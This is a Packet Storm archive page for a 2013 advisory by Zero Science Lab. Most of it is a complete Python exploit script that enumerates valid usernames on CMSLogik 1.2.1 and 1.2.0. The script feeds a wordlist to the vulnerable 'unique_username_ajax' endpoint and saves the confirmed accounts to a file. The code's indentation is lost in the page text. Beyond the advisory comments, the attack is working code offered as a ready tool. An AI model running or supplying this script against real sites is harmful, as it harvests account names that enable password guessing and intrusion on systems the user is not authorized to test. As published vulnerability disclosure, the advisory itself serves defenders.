what you don't know can hurt you

CMSLogik 1.2.1 User Enumeration Weakness

CMSLogik 1.2.1 User Enumeration Weakness
Posted Apr 15, 2013
Authored by LiquidWorm | Site zeroscience.mk

CMSLogik version 1.2.1 suffers from a user enumeration weakness vulnerability.

tags | exploit
MD5 | 6f004115f2ebeefbc18d7e2b8a7dc2ae

CMSLogik 1.2.1 User Enumeration Weakness

Change Mirror Download
#!/usr/bin/python
#
# CMSLogik 1.2.1 (user param) User Enumeration Weakness
#
#
# Vendor: ThemeLogik
# Product web page: http://www.themelogik.com/cmslogik
# Affected version: 1.2.1 and 1.2.0
#
# Summary: CMSLogik is built on a solid & lightweight framework
# called CodeIgniter, and design powered by Bootstrap. This
# combination allows for greater security, extensive flexibility,
# and ease of use. You can use CMSLogik for almost any niche that
# your project might fall into.
#
# Desc: The weakness is caused due to the 'unique_username_ajax'
# script enumerating the list of valid usernames when some characters
# are provided via the 'user' parameter.
#
# Tested on: Apache/2.2.22
# PHP/5.3.15
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2013-5137
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5137.php
#
#
# 05.04.2013
#

import argparse, sys, json, urllib, urllib2, cookielib
from colorama import Fore, Back, Style, init

init()

print '\n-----------------------------------------------'
print 'User Enumeration Tool v0.1 for CMSLogik 1.2.x'
print 'Copyleft (c) 2013, Zero Science Lab'
print 'by lqwrm'
print '-----------------------------------------------\n'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-d', help='target dir', action='store', dest='dir')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')
args = parser.parse_args()
if len(sys.argv) != 7:
parser.print_help()
print '\n[*] Example: cmslogik_enum.py -t zeroscience.mk -d cmslogik -f users.txt'
sys.exit()
host = args.target
path = args.dir
fn = args.file
print '\n'
try:
users = open(args.file, 'r')
except(IOError):
print '[!] Error opening \'' +fn+ '\' file.'
sys.exit()
lines = users.read().splitlines()
print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines())
users.close()
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
results = open('validusers.txt', 'w')
for line in lines:
chk_usr = urllib.urlencode({'user' : line})
try:
xhr = json.load(opener.open('http://' +host+ '/' +path+ '/main/unique_username_ajax', chk_usr))
except:
print '[!] Error connecting to http://' +host+ '/' +path
sys.exit()
print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
for key, value in xhr.iteritems():
fnrand = value
break
if fnrand == '1':
print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Style.RESET_ALL+Fore.RESET+ ' as valid registered user.'
results.write('%s\n' % line)
results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.'
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    32 Files
  • 25
    Nov 25th
    9 Files
  • 26
    Nov 26th
    11 Files
  • 27
    Nov 27th
    15 Files
  • 28
    Nov 28th
    9 Files
  • 29
    Nov 29th
    2 Files
  • 30
    Nov 30th
    17 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close